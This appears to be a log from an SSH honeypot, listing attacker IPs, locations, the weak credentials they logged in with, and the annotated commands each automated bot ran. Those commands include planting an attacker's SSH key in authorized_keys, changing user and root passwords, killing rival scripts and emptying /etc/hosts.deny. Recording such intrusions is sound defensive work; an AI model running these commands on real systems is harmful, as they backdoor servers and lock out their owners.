$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nGIxpQ0x0SaMi\nGIxpQ0x0SaMi"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nGIxpQ0x0SaMi\nGIxpQ0x0SaMi\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:lwYqvWRMdgv5"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_root_26 (41.82.50.218) β€” Dakar, Senegal Β· 2 sessions Β· 39 cmds
2026-06-10 08:13 EDT Β· as root/p@$$W0rd, trash/trash
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "trash\ntjoi0nNi4ttL\ntjoi0nNi4ttL"|passwd|bash
$ Enter new UNIX password:
$ echo "trash\ntjoi0nNi4ttL\ntjoi0nNi4ttL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:0R64GfYivthA"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 shadow_root_25 (187.141.71.166) β€” San Miguel de Cozumel, Mexico Β· 1 session Β· 20 cmds
2026-06-10 08:18 EDT Β· as logviewer/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nKmjLPVYEemCu\nKmjLPVYEemCu"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nKmjLPVYEemCu\nKmjLPVYEemCu\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_31 (58.152.42.174) β€” Central, Hong Kong Β· 2 sessions Β· 40 cmds
2026-06-05 18:02 EDT Β· as bareos/bareos, trash/trash
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "trash\nGSvJZlwgyqoV\nGSvJZlwgyqoV"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "trash\nGSvJZlwgyqoV\nGSvJZlwgyqoV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "bareos\no8g72MnZBCQ5\no8g72MnZBCQ5"|passwd|bash
$ echo "bareos\no8g72MnZBCQ5\no8g72MnZBCQ5\n"|passwd
🎭 dragon_root_5 (118.196.4.129) β€” Haidian, China Β· 1 session Β· 19 cmds
2026-06-10 08:11 EDT Β· as root/qwertyuiop789
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:nxWoYmmLEV4q"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_2 (14.103.112.179) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-06-10 08:09 EDT Β· as root/asdfg
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:W2KpTwr0T8MG"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow (190.0.63.226) β€” MedellΓ­n, Colombia Β· 1 session Β· 20 cmds
2026-06-10 07:56 EDT Β· as trash/trash
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "trash\nJsu0zUqAixoM\nJsu0zUqAixoM"|passwd|bash
$ Enter new UNIX password:
$ echo "trash\nJsu0zUqAixoM\nJsu0zUqAixoM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_32 (103.171.69.82) β€” Kafrul, Bangladesh Β· 1 session Β· 20 cmds
2026-06-10 07:36 EDT Β· as report/admin
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "admin\ntnI2fN2hOSvC\ntnI2fN2hOSvC"|passwd|bash
$ Enter new UNIX password:
$ echo "admin\ntnI2fN2hOSvC\ntnI2fN2hOSvC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_30 (185.39.204.145) β€” Istanbul, TΓΌrkiye Β· 1 session Β· 19 cmds
2026-06-10 07:28 EDT Β· as root/@qwer2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:zQP63t1eOpNH"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_31 (154.221.20.92) β€” Chai Wan, Hong Kong Β· 1 session Β· 20 cmds
2026-06-10 07:15 EDT Β· as deploy/q1w2e3r4
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "q1w2e3r4\nvA62BIbUcEJt\nvA62BIbUcEJt"|passwd|bash
$ Enter new UNIX password:
$ echo "q1w2e3r4\nvA62BIbUcEJt\nvA62BIbUcEJt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_27 (103.171.69.70) β€” Kafrul, Bangladesh Β· 1 session Β· 20 cmds
2026-06-10 07:14 EDT Β· as deployer/deployerpassword
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "deployerpassword\nXgN0qazIwUIP\nXgN0qazIwUIP"|passwd|bash
$ Enter new UNIX password:
$ echo "deployerpassword\nXgN0qazIwUIP\nXgN0qazIwUIP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_17 (143.95.213.196) β€” Jacksonville, United States Β· 1 session Β· 1 cmd
2026-06-10 06:35 EDT Β· as root/jimster.1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wraith_root_31 (152.32.189.59) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 40 cmds
2026-06-10 05:24 EDT Β· as mahima/mahima, sharepoint/sharepoint
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "sharepoint\nNhVVZGjg7yiF\nNhVVZGjg7yiF"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "sharepoint\nNhVVZGjg7yiF\nNhVVZGjg7yiF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "mahima\nEGKl38FKRGC0\nEGKl38FKRGC0"|passwd|bash
$ echo "mahima\nEGKl38FKRGC0\nEGKl38FKRGC0\n"|passwd
🎭 wraith_root_32 (156.232.13.161) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 40 cmds
2026-06-10 05:23 EDT Β· as mahima/mahima, sharepoint/sharepoint
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "mahima\n94tbrSoP4U0n\n94tbrSoP4U0n"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "mahima\n94tbrSoP4U0n\n94tbrSoP4U0n\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "sharepoint\nGunwGYkyiVOe\nGunwGYkyiVOe"|passwd|bash
$ echo "sharepoint\nGunwGYkyiVOe\nGunwGYkyiVOe\n"|passwd
🎭 ramen_root (92.113.142.203) β€” Tokyo, Japan Β· 3 sessions Β· 59 cmds
2026-06-03 09:46 EDT Β· as mahima/mahima, root/P@$$123!, sharepoint/sharepoint
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "mahima\n6G8TalsRe0jr\n6G8TalsRe0jr"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "mahima\n6G8TalsRe0jr\n6G8TalsRe0jr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
